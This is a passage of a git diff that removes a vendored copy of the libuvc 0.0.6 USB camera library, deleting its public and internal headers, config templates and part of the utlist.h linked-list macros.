-uvc_error_t uvc_set_pantilt_abs(uvc_device_handle_t *devh, int32_t pan, int32_t tilt);
-
-uvc_error_t uvc_get_pantilt_rel(uvc_device_handle_t *devh, int8_t* pan_rel, uint8_t* pan_speed, int8_t* tilt_rel, uint8_t* tilt_speed, enum uvc_req_code req_code);
-uvc_error_t uvc_set_pantilt_rel(uvc_device_handle_t *devh, int8_t pan_rel, uint8_t pan_speed, int8_t tilt_rel, uint8_t tilt_speed);
-
-uvc_error_t uvc_get_roll_abs(uvc_device_handle_t *devh, int16_t* roll, enum uvc_req_code req_code);
-uvc_error_t uvc_set_roll_abs(uvc_device_handle_t *devh, int16_t roll);
-
-uvc_error_t uvc_get_roll_rel(uvc_device_handle_t *devh, int8_t* roll_rel, uint8_t* speed, enum uvc_req_code req_code);
-uvc_error_t uvc_set_roll_rel(uvc_device_handle_t *devh, int8_t roll_rel, uint8_t speed);
-
-uvc_error_t uvc_get_privacy(uvc_device_handle_t *devh, uint8_t* privacy, enum uvc_req_code req_code);
-uvc_error_t uvc_set_privacy(uvc_device_handle_t *devh, uint8_t privacy);
-
-uvc_error_t uvc_get_digital_window(uvc_device_handle_t *devh, uint16_t* window_top, uint16_t* window_left, uint16_t* window_bottom, uint16_t* window_right, uint16_t* num_steps, uint16_t* num_steps_units, enum uvc_req_code req_code);
-uvc_error_t uvc_set_digital_window(uvc_device_handle_t *devh, uint16_t window_top, uint16_t window_left, uint16_t window_bottom, uint16_t window_right, uint16_t num_steps, uint16_t num_steps_units);
-
-uvc_error_t uvc_get_digital_roi(uvc_device_handle_t *devh, uint16_t* roi_top, uint16_t* roi_left, uint16_t* roi_bottom, uint16_t* roi_right, uint16_t* auto_controls, enum uvc_req_code req_code);
-uvc_error_t uvc_set_digital_roi(uvc_device_handle_t *devh, uint16_t roi_top, uint16_t roi_left, uint16_t roi_bottom, uint16_t roi_right, uint16_t auto_controls);
-
-uvc_error_t uvc_get_backlight_compensation(uvc_device_handle_t *devh, uint16_t* backlight_compensation, enum uvc_req_code req_code);
-uvc_error_t uvc_set_backlight_compensation(uvc_device_handle_t *devh, uint16_t backlight_compensation);
-
-uvc_error_t uvc_get_brightness(uvc_device_handle_t *devh, int16_t* brightness, enum uvc_req_code req_code);
-uvc_error_t uvc_set_brightness(uvc_device_handle_t *devh, int16_t brightness);
-
-uvc_error_t uvc_get_contrast(uvc_device_handle_t *devh, uint16_t* contrast, enum uvc_req_code req_code);
-uvc_error_t uvc_set_contrast(uvc_device_handle_t *devh, uint16_t contrast);
-
-uvc_error_t uvc_get_contrast_auto(uvc_device_handle_t *devh, uint8_t* contrast_auto, enum uvc_req_code req_code);
-uvc_error_t uvc_set_contrast_auto(uvc_device_handle_t *devh, uint8_t contrast_auto);
-
-uvc_error_t uvc_get_gain(uvc_device_handle_t *devh, uint16_t* gain, enum uvc_req_code req_code);
-uvc_error_t uvc_set_gain(uvc_device_handle_t *devh, uint16_t gain);
-
-uvc_error_t uvc_get_power_line_frequency(uvc_device_handle_t *devh, uint8_t* power_line_frequency, enum uvc_req_code req_code);
-uvc_error_t uvc_set_power_line_frequency(uvc_device_handle_t *devh, uint8_t power_line_frequency);
-
-uvc_error_t uvc_get_hue(uvc_device_handle_t *devh, int16_t* hue, enum uvc_req_code req_code);
-uvc_error_t uvc_set_hue(uvc_device_handle_t *devh, int16_t hue);
-
-uvc_error_t uvc_get_hue_auto(uvc_device_handle_t *devh, uint8_t* hue_auto, enum uvc_req_code req_code);
-uvc_error_t uvc_set_hue_auto(uvc_device_handle_t *devh, uint8_t hue_auto);
-
-uvc_error_t uvc_get_saturation(uvc_device_handle_t *devh, uint16_t* saturation, enum uvc_req_code req_code);
-uvc_error_t uvc_set_saturation(uvc_device_handle_t *devh, uint16_t saturation);
-
-uvc_error_t uvc_get_sharpness(uvc_device_handle_t *devh, uint16_t* sharpness, enum uvc_req_code req_code);
-uvc_error_t uvc_set_sharpness(uvc_device_handle_t *devh, uint16_t sharpness);
-
-uvc_error_t uvc_get_gamma(uvc_device_handle_t *devh, uint16_t* gamma, enum uvc_req_code req_code);
-uvc_error_t uvc_set_gamma(uvc_device_handle_t *devh, uint16_t gamma);
-
-uvc_error_t uvc_get_white_balance_temperature(uvc_device_handle_t *devh, uint16_t* temperature, enum uvc_req_code req_code);
-uvc_error_t uvc_set_white_balance_temperature(uvc_device_handle_t *devh, uint16_t temperature);
-
-uvc_error_t uvc_get_white_balance_temperature_auto(uvc_device_handle_t *devh, uint8_t* temperature_auto, enum uvc_req_code req_code);
-uvc_error_t uvc_set_white_balance_temperature_auto(uvc_device_handle_t *devh, uint8_t temperature_auto);
-
-uvc_error_t uvc_get_white_balance_component(uvc_device_handle_t *devh, uint16_t* blue, uint16_t* red, enum uvc_req_code req_code);
-uvc_error_t uvc_set_white_balance_component(uvc_device_handle_t *devh, uint16_t blue, uint16_t red);
-
-uvc_error_t uvc_get_white_balance_component_auto(uvc_device_handle_t *devh, uint8_t* white_balance_component_auto, enum uvc_req_code req_code);
-uvc_error_t uvc_set_white_balance_component_auto(uvc_device_handle_t *devh, uint8_t white_balance_component_auto);
-
-uvc_error_t uvc_get_digital_multiplier(uvc_device_handle_t *devh, uint16_t* multiplier_step, enum uvc_req_code req_code);
-uvc_error_t uvc_set_digital_multiplier(uvc_device_handle_t *devh, uint16_t multiplier_step);
-
-uvc_error_t uvc_get_digital_multiplier_limit(uvc_device_handle_t *devh, uint16_t* multiplier_step, enum uvc_req_code req_code);
-uvc_error_t uvc_set_digital_multiplier_limit(uvc_device_handle_t *devh, uint16_t multiplier_step);
-
-uvc_error_t uvc_get_analog_video_standard(uvc_device_handle_t *devh, uint8_t* video_standard, enum uvc_req_code req_code);
-uvc_error_t uvc_set_analog_video_standard(uvc_device_handle_t *devh, uint8_t video_standard);
-
-uvc_error_t uvc_get_analog_video_lock_status(uvc_device_handle_t *devh, uint8_t* status, enum uvc_req_code req_code);
-uvc_error_t uvc_set_analog_video_lock_status(uvc_device_handle_t *devh, uint8_t status);
-
-uvc_error_t uvc_get_input_select(uvc_device_handle_t *devh, uint8_t* selector, enum uvc_req_code req_code);
-uvc_error_t uvc_set_input_select(uvc_device_handle_t *devh, uint8_t selector);
-/* end AUTO-GENERATED control accessors */
-
-void uvc_perror(uvc_error_t err, const char *msg);
-const char* uvc_strerror(uvc_error_t err);
-void uvc_print_diag(uvc_device_handle_t *devh, FILE *stream);
-void uvc_print_stream_ctrl(uvc_stream_ctrl_t *ctrl, FILE *stream);
-
-uvc_frame_t *uvc_allocate_frame(size_t data_bytes);
-void uvc_free_frame(uvc_frame_t *frame);
-
-uvc_error_t uvc_duplicate_frame(uvc_frame_t *in, uvc_frame_t *out);
-
-uvc_error_t uvc_yuyv2rgb(uvc_frame_t *in, uvc_frame_t *out);
-uvc_error_t uvc_uyvy2rgb(uvc_frame_t *in, uvc_frame_t *out);
-uvc_error_t uvc_any2rgb(uvc_frame_t *in, uvc_frame_t *out);
-
-uvc_error_t uvc_yuyv2bgr(uvc_frame_t *in, uvc_frame_t *out);
-uvc_error_t uvc_uyvy2bgr(uvc_frame_t *in, uvc_frame_t *out);
-uvc_error_t uvc_any2bgr(uvc_frame_t *in, uvc_frame_t *out);
-
-uvc_error_t uvc_yuyv2y(uvc_frame_t *in, uvc_frame_t *out);
-uvc_error_t uvc_yuyv2uv(uvc_frame_t *in, uvc_frame_t *out);
-
-#ifdef LIBUVC_HAS_JPEG
-uvc_error_t uvc_mjpeg2rgb(uvc_frame_t *in, uvc_frame_t *out);
-#endif
-
-#ifdef __cplusplus
-}
-#endif
-
-#endif // !def(LIBUVC_H)
-
diff --git a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_config.h b/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_config.h
deleted file mode 100644
index 9ab0ac9..0000000
--- a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_config.h
+++ /dev/null
@@ -1,22 +0,0 @@
-#ifndef LIBUVC_CONFIG_H
-#define LIBUVC_CONFIG_H
-
-#define LIBUVC_VERSION_MAJOR 0
-#define LIBUVC_VERSION_MINOR 0
-#define LIBUVC_VERSION_PATCH 6
-#define LIBUVC_VERSION_STR "0.0.6"
-#define LIBUVC_VERSION_INT                      \
-  ((0 << 16) |             \
-   (0 << 8) |              \
-   (6))
-
-/** @brief Test whether libuvc is new enough
- * This macro evaluates true iff the current version is
- * at least as new as the version specified.
- */
-#define LIBUVC_VERSION_GTE(major, minor, patch)                         \
-  (LIBUVC_VERSION_INT >= (((major) << 16) | ((minor) << 8) | (patch)))
-
-/* #define LIBUVC_HAS_JPEG 1 */
-
-#endif // !def(LIBUVC_CONFIG_H)
\ No newline at end of file
diff --git a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_config.h.in b/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_config.h.in
deleted file mode 100644
index 3bbd653..0000000
--- a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_config.h.in
+++ /dev/null
@@ -1,22 +0,0 @@
-#ifndef LIBUVC_CONFIG_H
-#define LIBUVC_CONFIG_H
-
-#define LIBUVC_VERSION_MAJOR @libuvc_VERSION_MAJOR@
-#define LIBUVC_VERSION_MINOR @libuvc_VERSION_MINOR@
-#define LIBUVC_VERSION_PATCH @libuvc_VERSION_PATCH@
-#define LIBUVC_VERSION_STR "@libuvc_VERSION@"
-#define LIBUVC_VERSION_INT                      \
-  ((@libuvc_VERSION_MAJOR@ << 16) |             \
-   (@libuvc_VERSION_MINOR@ << 8) |              \
-   (@libuvc_VERSION_PATCH@))
-
-/** @brief Test whether libuvc is new enough
- * This macro evaluates true iff the current version is
- * at least as new as the version specified.
- */
-#define LIBUVC_VERSION_GTE(major, minor, patch)                         \
-  (LIBUVC_VERSION_INT >= (((major) << 16) | ((minor) << 8) | (patch)))
-
-#cmakedefine LIBUVC_HAS_JPEG 1
-
-#endif // !def(LIBUVC_CONFIG_H)
diff --git a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_internal.h b/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_internal.h
deleted file mode 100644
index 829b294..0000000
--- a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc_internal.h
+++ /dev/null
@@ -1,300 +0,0 @@
-/** @file libuvc_internal.h
-  * @brief Implementation-specific UVC constants and structures.
-  * @cond include_hidden
-  */
-#ifndef LIBUVC_INTERNAL_H
-#define LIBUVC_INTERNAL_H
-
-#include <assert.h>
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-#include <pthread.h>
-#include <signal.h>
-#include <libusb.h>
-#include "utlist.h"
-
-/** Converts an unaligned four-byte little-endian integer into an int32 */
-#define DW_TO_INT(p) ((p)[0] | ((p)[1] << 8) | ((p)[2] << 16) | ((p)[3] << 24))
-/** Converts an unaligned two-byte little-endian integer into an int16 */
-#define SW_TO_SHORT(p) ((p)[0] | ((p)[1] << 8))
-/** Converts an int16 into an unaligned two-byte little-endian integer */
-#define SHORT_TO_SW(s, p) \
-  (p)[0] = (s); \
-  (p)[1] = (s) >> 8;
-/** Converts an int32 into an unaligned four-byte little-endian integer */
-#define INT_TO_DW(i, p) \
-  (p)[0] = (i); \
-  (p)[1] = (i) >> 8; \
-  (p)[2] = (i) >> 16; \
-  (p)[3] = (i) >> 24;
-
-/** Selects the nth item in a doubly linked list. n=-1 selects the last item. */
-#define DL_NTH(head, out, n) \
-  do { \
-    int dl_nth_i = 0; \
-    LDECLTYPE(head) dl_nth_p = (head); \
-    if ((n) < 0) { \
-      while (dl_nth_p && dl_nth_i > (n)) { \
-        dl_nth_p = dl_nth_p->prev; \
-        dl_nth_i--; \
-      } \
-    } else { \
-      while (dl_nth_p && dl_nth_i < (n)) { \
-        dl_nth_p = dl_nth_p->next; \
-        dl_nth_i++; \
-      } \
-    } \
-    (out) = dl_nth_p; \
-  } while (0);
-
-#ifdef UVC_DEBUGGING
-#include <libgen.h>
-#define UVC_DEBUG(format, ...) fprintf(stderr, "[%s:%d/%s] " format "\n", basename(__FILE__), __LINE__, __FUNCTION__, ##__VA_ARGS__)
-#define UVC_ENTER() fprintf(stderr, "[%s:%d] begin %s\n", basename(__FILE__), __LINE__, __FUNCTION__)
-#define UVC_EXIT(code) fprintf(stderr, "[%s:%d] end %s (%d)\n", basename(__FILE__), __LINE__, __FUNCTION__, code)
-#define UVC_EXIT_VOID() fprintf(stderr, "[%s:%d] end %s\n", basename(__FILE__), __LINE__, __FUNCTION__)
-#else
-#define UVC_DEBUG(format, ...)
-#define UVC_ENTER()
-#define UVC_EXIT_VOID()
-#define UVC_EXIT(code)
-#endif
-
-/* http://stackoverflow.com/questions/19452971/array-size-macro-that-rejects-pointers */
-#define IS_INDEXABLE(arg) (sizeof(arg[0]))
-#define IS_ARRAY(arg) (IS_INDEXABLE(arg) && (((void *) &arg) == ((void *) arg)))
-#define ARRAYSIZE(arr) (sizeof(arr) / (IS_ARRAY(arr) ? sizeof(arr[0]) : 0))
-
-/** Video interface subclass code (A.2) */
-enum uvc_int_subclass_code {
-  UVC_SC_UNDEFINED = 0x00,
-  UVC_SC_VIDEOCONTROL = 0x01,
-  UVC_SC_VIDEOSTREAMING = 0x02,
-  UVC_SC_VIDEO_INTERFACE_COLLECTION = 0x03
-};
-
-/** Video interface protocol code (A.3) */
-enum uvc_int_proto_code {
-  UVC_PC_PROTOCOL_UNDEFINED = 0x00
-};
-
-/** VideoControl interface descriptor subtype (A.5) */
-enum uvc_vc_desc_subtype {
-  UVC_VC_DESCRIPTOR_UNDEFINED = 0x00,
-  UVC_VC_HEADER = 0x01,
-  UVC_VC_INPUT_TERMINAL = 0x02,
-  UVC_VC_OUTPUT_TERMINAL = 0x03,
-  UVC_VC_SELECTOR_UNIT = 0x04,
-  UVC_VC_PROCESSING_UNIT = 0x05,
-  UVC_VC_EXTENSION_UNIT = 0x06
-};
-
-/** UVC endpoint descriptor subtype (A.7) */
-enum uvc_ep_desc_subtype {
-  UVC_EP_UNDEFINED = 0x00,
-  UVC_EP_GENERAL = 0x01,
-  UVC_EP_ENDPOINT = 0x02,
-  UVC_EP_INTERRUPT = 0x03
-};
-
-/** VideoControl interface control selector (A.9.1) */
-enum uvc_vc_ctrl_selector {
-  UVC_VC_CONTROL_UNDEFINED = 0x00,
-  UVC_VC_VIDEO_POWER_MODE_CONTROL = 0x01,
-  UVC_VC_REQUEST_ERROR_CODE_CONTROL = 0x02
-};
-
-/** Terminal control selector (A.9.2) */
-enum uvc_term_ctrl_selector {
-  UVC_TE_CONTROL_UNDEFINED = 0x00
-};
-
-/** Selector unit control selector (A.9.3) */
-enum uvc_su_ctrl_selector {
-  UVC_SU_CONTROL_UNDEFINED = 0x00,
-  UVC_SU_INPUT_SELECT_CONTROL = 0x01
-};
-
-/** Extension unit control selector (A.9.6) */
-enum uvc_xu_ctrl_selector {
-  UVC_XU_CONTROL_UNDEFINED = 0x00
-};
-
-/** VideoStreaming interface control selector (A.9.7) */
-enum uvc_vs_ctrl_selector {
-  UVC_VS_CONTROL_UNDEFINED = 0x00,
-  UVC_VS_PROBE_CONTROL = 0x01,
-  UVC_VS_COMMIT_CONTROL = 0x02,
-  UVC_VS_STILL_PROBE_CONTROL = 0x03,
-  UVC_VS_STILL_COMMIT_CONTROL = 0x04,
-  UVC_VS_STILL_IMAGE_TRIGGER_CONTROL = 0x05,
-  UVC_VS_STREAM_ERROR_CODE_CONTROL = 0x06,
-  UVC_VS_GENERATE_KEY_FRAME_CONTROL = 0x07,
-  UVC_VS_UPDATE_FRAME_SEGMENT_CONTROL = 0x08,
-  UVC_VS_SYNC_DELAY_CONTROL = 0x09
-};
-
-/** Status packet type (2.4.2.2) */
-enum uvc_status_type {
-  UVC_STATUS_TYPE_CONTROL = 1,
-  UVC_STATUS_TYPE_STREAMING = 2
-};
-
-/** Payload header flags (2.4.3.3) */
-#define UVC_STREAM_EOH (1 << 7)
-#define UVC_STREAM_ERR (1 << 6)
-#define UVC_STREAM_STI (1 << 5)
-#define UVC_STREAM_RES (1 << 4)
-#define UVC_STREAM_SCR (1 << 3)
-#define UVC_STREAM_PTS (1 << 2)
-#define UVC_STREAM_EOF (1 << 1)
-#define UVC_STREAM_FID (1 << 0)
-
-/** Control capabilities (4.1.2) */
-#define UVC_CONTROL_CAP_GET (1 << 0)
-#define UVC_CONTROL_CAP_SET (1 << 1)
-#define UVC_CONTROL_CAP_DISABLED (1 << 2)
-#define UVC_CONTROL_CAP_AUTOUPDATE (1 << 3)
-#define UVC_CONTROL_CAP_ASYNCHRONOUS (1 << 4)
-
-struct uvc_streaming_interface;
-struct uvc_device_info;
-
-/** VideoStream interface */
-typedef struct uvc_streaming_interface {
-  struct uvc_device_info *parent;
-  struct uvc_streaming_interface *prev, *next;
-  /** Interface number */
-  uint8_t bInterfaceNumber;
-  /** Video formats that this interface provides */
-  struct uvc_format_desc *format_descs;
-  /** USB endpoint to use when communicating with this interface */
-  uint8_t bEndpointAddress;
-  uint8_t bTerminalLink;
-} uvc_streaming_interface_t;
-
-/** VideoControl interface */
-typedef struct uvc_control_interface {
-  struct uvc_device_info *parent;
-  struct uvc_input_terminal *input_term_descs;
-  // struct uvc_output_terminal *output_term_descs;
-  struct uvc_selector_unit *selector_unit_descs;
-  struct uvc_processing_unit *processing_unit_descs;
-  struct uvc_extension_unit *extension_unit_descs;
-  uint16_t bcdUVC;
-  uint32_t dwClockFrequency;
-  uint8_t bEndpointAddress;
-  /** Interface number */
-  uint8_t bInterfaceNumber;
-} uvc_control_interface_t;
-
-struct uvc_stream_ctrl;
-
-struct uvc_device {
-  struct uvc_context *ctx;
-  int ref;
-  libusb_device *usb_dev;
-};
-
-typedef struct uvc_device_info {
-  /** Configuration descriptor for USB device */
-  struct libusb_config_descriptor *config;
-  /** VideoControl interface provided by device */
-  uvc_control_interface_t ctrl_if;
-  /** VideoStreaming interfaces on the device */
-  uvc_streaming_interface_t *stream_ifs;
-} uvc_device_info_t;
-
-/*
-  set a high number of transfer buffers. This uses a lot of ram, but
-  avoids problems with scheduling delays on slow boards causing missed
-  transfers. A better approach may be to make the transfer thread FIFO
-  scheduled (if we have root).
-  We could/should change this to allow reduce it to, say, 5 by default
-  and then allow the user to change the number of buffers as required.
- */
-#define LIBUVC_NUM_TRANSFER_BUFS 100
-
-#define LIBUVC_XFER_BUF_SIZE	( 16 * 1024 * 1024 )
-
-struct uvc_stream_handle {
-  struct uvc_device_handle *devh;
-  struct uvc_stream_handle *prev, *next;
-  struct uvc_streaming_interface *stream_if;
-
-  /** if true, stream is running (streaming video to host) */
-  uint8_t running;
-  /** Current control block */
-  struct uvc_stream_ctrl cur_ctrl;
-
-  /* listeners may only access hold*, and only when holding a
-   * lock on cb_mutex (probably signaled with cb_cond) */
-  uint8_t fid;
-  uint32_t seq, hold_seq;
-  uint32_t pts, hold_pts;
-  uint32_t last_scr, hold_last_scr;
-  size_t got_bytes, hold_bytes;
-  uint8_t *outbuf, *holdbuf;
-  pthread_mutex_t cb_mutex;
-  pthread_cond_t cb_cond;
-  pthread_t cb_thread;
-  uint32_t last_polled_seq;
-  uvc_frame_callback_t *user_cb;
-  void *user_ptr;
-  struct libusb_transfer *transfers[LIBUVC_NUM_TRANSFER_BUFS];
-  uint8_t *transfer_bufs[LIBUVC_NUM_TRANSFER_BUFS];
-  struct uvc_frame frame;
-  enum uvc_frame_format frame_format;
-};
-
-/** Handle on an open UVC device
- *
- * @todo move most of this into a uvc_device struct?
- */
-struct uvc_device_handle {
-  struct uvc_device *dev;
-  struct uvc_device_handle *prev, *next;
-  /** Underlying USB device handle */
-  libusb_device_handle *usb_devh;
-  struct uvc_device_info *info;
-  struct libusb_transfer *status_xfer;
-  uint8_t status_buf[32];
-  /** Function to call when we receive status updates from the camera */
-  uvc_status_callback_t *status_cb;
-  void *status_user_ptr;
-  /** Function to call when we receive button events from the camera */
-  uvc_button_callback_t *button_cb;
-  void *button_user_ptr;
-
-  uvc_stream_handle_t *streams;
-  /** Whether the camera is an iSight that sends one header per frame */
-  uint8_t is_isight;
-  uint32_t claimed;
-};
-
-/** Context within which we communicate with devices */
-struct uvc_context {
-  /** Underlying context for USB communication */
-  struct libusb_context *usb_ctx;
-  /** True iff libuvc initialized the underlying USB context */
-  uint8_t own_usb_ctx;
-  /** List of open devices in this context */
-  uvc_device_handle_t *open_devices;
-  pthread_t handler_thread;
-  int kill_handler_thread;
-};
-
-uvc_error_t uvc_query_stream_ctrl(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    uint8_t probe,
-    enum uvc_req_code req);
-
-void uvc_start_handler_thread(uvc_context_t *ctx);
-uvc_error_t uvc_claim_if(uvc_device_handle_t *devh, int idx);
-uvc_error_t uvc_release_if(uvc_device_handle_t *devh, int idx);
-
-#endif // !def(LIBUVC_INTERNAL_H)
-/** @endcond */
-
diff --git a/thirdparty/libuvc-0.0.6/include/utlist.h b/thirdparty/libuvc-0.0.6/include/utlist.h
deleted file mode 100644
index 34c725b..0000000
--- a/thirdparty/libuvc-0.0.6/include/utlist.h
+++ /dev/null
@@ -1,490 +0,0 @@
-/*
-Copyright (c) 2007-2010, Troy D. Hanson   http://uthash.sourceforge.net
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-    * Redistributions of source code must retain the above copyright
-      notice, this list of conditions and the following disclaimer.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
-IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
-TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
-PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
-OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
-EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
-PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
-PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
-LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
-NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
-SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#ifndef UTLIST_H
-#define UTLIST_H
-
-#define UTLIST_VERSION 1.9.1
-
-/* 
- * This file contains macros to manipulate singly and doubly-linked lists.
- *
- * 1. LL_ macros:  singly-linked lists.
- * 2. DL_ macros:  doubly-linked lists.
- * 3. CDL_ macros: circular doubly-linked lists.
- *
- * To use singly-linked lists, your structure must have a "next" pointer.
- * To use doubly-linked lists, your structure must "prev" and "next" pointers.
- * Either way, the pointer to the head of the list must be initialized to NULL.
- * 
- * ----------------.EXAMPLE -------------------------
- * struct item {
- *      int id;
- *      struct item *prev, *next;
- * }
- *
- * struct item *list = NULL:
- *
- * int main() {
- *      struct item *item;
- *      ... allocate and populate item ...
- *      DL_APPEND(list, item);
- * }
- * --------------------------------------------------
- *
- * For doubly-linked lists, the append and delete macros are O(1)
- * For singly-linked lists, append and delete are O(n) but prepend is O(1)
- * The sort macro is O(n log(n)) for all types of single/double/circular lists.
- */
-
-/* These macros use decltype or the earlier __typeof GNU extension.
-   As decltype is only available in newer compilers (VS2010 or gcc 4.3+
-   when compiling c++ code), this code uses whatever method is needed
-   or, for VS2008 where neither is available, uses casting workarounds. */
-#ifdef _MSC_VER            /* MS compiler */
-#if _MSC_VER >= 1600 && defined(__cplusplus)  /* VS2010 or newer in C++ mode */
-#define LDECLTYPE(x) decltype(x)
-#else                     /* VS2008 or older (or VS2010 in C mode) */
-#define NO_DECLTYPE
-#define LDECLTYPE(x) char*
-#endif
-#else                      /* GNU, Sun and other compilers */
-#define LDECLTYPE(x) __typeof(x)
-#endif
-
-/* for VS2008 we use some workarounds to get around the lack of decltype,
- * namely, we always reassign our tmp variable to the list head if we need
- * to dereference its prev/next pointers, and save/restore the real head.*/
-#ifdef NO_DECLTYPE
-#define _SV(elt,list) _tmp = (char*)(list); {char **_alias = (char**)&(list); *_alias = (elt); }
-#define _NEXT(elt,list) ((char*)((list)->next))
-#define _NEXTASGN(elt,list,to) { char **_alias = (char**)&((list)->next); *_alias=(char*)(to); }
-#define _PREV(elt,list) ((char*)((list)->prev))
-#define _PREVASGN(elt,list,to) { char **_alias = (char**)&((list)->prev); *_alias=(char*)(to); }
-#define _RS(list) { char **_alias = (char**)&(list); *_alias=_tmp; }
-#define _CASTASGN(a,b) { char **_alias = (char**)&(a); *_alias=(char*)(b); }
-#else 
-#define _SV(elt,list)
-#define _NEXT(elt,list) ((elt)->next)
-#define _NEXTASGN(elt,list,to) ((elt)->next)=(to)
-#define _PREV(elt,list) ((elt)->prev)
-#define _PREVASGN(elt,list,to) ((elt)->prev)=(to)
-#define _RS(list)
-#define _CASTASGN(a,b) (a)=(b)
-#endif
-
-/******************************************************************************
- * The sort macro is an adaptation of Simon Tatham's O(n log(n)) mergesort    *
- * Unwieldy variable names used here to avoid shadowing passed-in variables.  *
- *****************************************************************************/
-#define LL_SORT(list, cmp)                                                                     \
-do {                                                                                           \
-  LDECLTYPE(list) _ls_p;                                                                       \
-  LDECLTYPE(list) _ls_q;                                                                       \
-  LDECLTYPE(list) _ls_e;                                                                       \
-  LDECLTYPE(list) _ls_tail;                                                                    \
-  LDECLTYPE(list) _ls_oldhead;                                                                 \
-  LDECLTYPE(list) _tmp;                                                                        \
-  int _ls_insize, _ls_nmerges, _ls_psize, _ls_qsize, _ls_i, _ls_looping;                       \
-  if (list) {                                                                                  \
-    _ls_insize = 1;                                                                            \
-    _ls_looping = 1;                                                                           \
-    while (_ls_looping) {                                                                      \
-      _CASTASGN(_ls_p,list);                                                                   \
-      _CASTASGN(_ls_oldhead,list);                                                             \
-      list = NULL;                                                                             \
-      _ls_tail = NULL;                                                                         \
-      _ls_nmerges = 0;                                                                         \
-      while (_ls_p) {                                                                          \
-        _ls_nmerges++;                                                                         \
-        _ls_q = _ls_p;                                                                         \
-        _ls_psize = 0;                                                                         \
-        for (_ls_i = 0; _ls_i < _ls_insize; _ls_i++) {                                         \
-          _ls_psize++;                                                                         \
-          _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list);                               \
-          if (!_ls_q) break;                                                                   \
-        }                                                                                      \
-        _ls_qsize = _ls_insize;                                                                \
-        while (_ls_psize > 0 || (_ls_qsize > 0 && _ls_q)) {                                    \
-          if (_ls_psize == 0) {                                                                \
-            _ls_e = _ls_q; _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list); _ls_qsize--; \
-          } else if (_ls_qsize == 0 || !_ls_q) {                                               \
-            _ls_e = _ls_p; _SV(_ls_p,list); _ls_p = _NEXT(_ls_p,list); _RS(list); _ls_psize--; \
-          } else if (cmp(_ls_p,_ls_q) <= 0) {                                                  \
-            _ls_e = _ls_p; _SV(_ls_p,list); _ls_p = _NEXT(_ls_p,list); _RS(list); _ls_psize--; \
-          } else {                                                                             \
-            _ls_e = _ls_q; _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list); _ls_qsize--; \
-          }                                                                                    \
-          if (_ls_tail) {                                                                      \
-            _SV(_ls_tail,list); _NEXTASGN(_ls_tail,list,_ls_e); _RS(list);                     \
-          } else {                                                                             \
-            _CASTASGN(list,_ls_e);                                                             \
-          }                                                                                    \
-          _ls_tail = _ls_e;                                                                    \
-        }                                                                                      \
-        _ls_p = _ls_q;                                                                         \
-      }                                                                                        \
-      _SV(_ls_tail,list); _NEXTASGN(_ls_tail,list,NULL); _RS(list);                            \
-      if (_ls_nmerges <= 1) {                                                                  \
-        _ls_looping=0;                                                                         \
-      }                                                                                        \
-      _ls_insize *= 2;                                                                         \
-    }                                                                                          \
-  } else _tmp=NULL; /* quiet gcc unused variable warning */                                    \
-} while (0)
-
-#define DL_SORT(list, cmp)                                                                     \
-do {                                                                                           \
-  LDECLTYPE(list) _ls_p;                                                                       \
-  LDECLTYPE(list) _ls_q;                                                                       \
-  LDECLTYPE(list) _ls_e;                                                                       \
-  LDECLTYPE(list) _ls_tail;                                                                    \
-  LDECLTYPE(list) _ls_oldhead;                                                                 \
-  LDECLTYPE(list) _tmp;                                                                        \
-  int _ls_insize, _ls_nmerges, _ls_psize, _ls_qsize, _ls_i, _ls_looping;                       \
-  if (list) {                                                                                  \
-    _ls_insize = 1;                                                                            \
-    _ls_looping = 1;                                                                           \
-    while (_ls_looping) {                                                                      \
-      _CASTASGN(_ls_p,list);                                                                   \
-      _CASTASGN(_ls_oldhead,list);                                                             \
-      list = NULL;                                                                             \
-      _ls_tail = NULL;                                                                         \
-      _ls_nmerges = 0;                                                                         \
-      while (_ls_p) {                                                                          \
-        _ls_nmerges++;                                                                         \
-        _ls_q = _ls_p;                                                                         \
-        _ls_psize = 0;                                                                         \
-        for (_ls_i = 0; _ls_i < _ls_insize; _ls_i++) {                                         \
-          _ls_psize++;                                                                         \
-          _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list);                               \
-          if (!_ls_q) break;                                                                   \
-        }                                                                                      \
-        _ls_qsize = _ls_insize;                                                                \
-        while (_ls_psize > 0 || (_ls_qsize > 0 && _ls_q)) {                                    \
-          if (_ls_psize == 0) {                                                                \
-            _ls_e = _ls_q; _SV(_ls_q,list); _ls_q = _NEXT(_ls_q,list); _RS(list); _ls_qsize--; \
-          } else if (_ls_qsize == 0 || !_ls_q) {                                               \
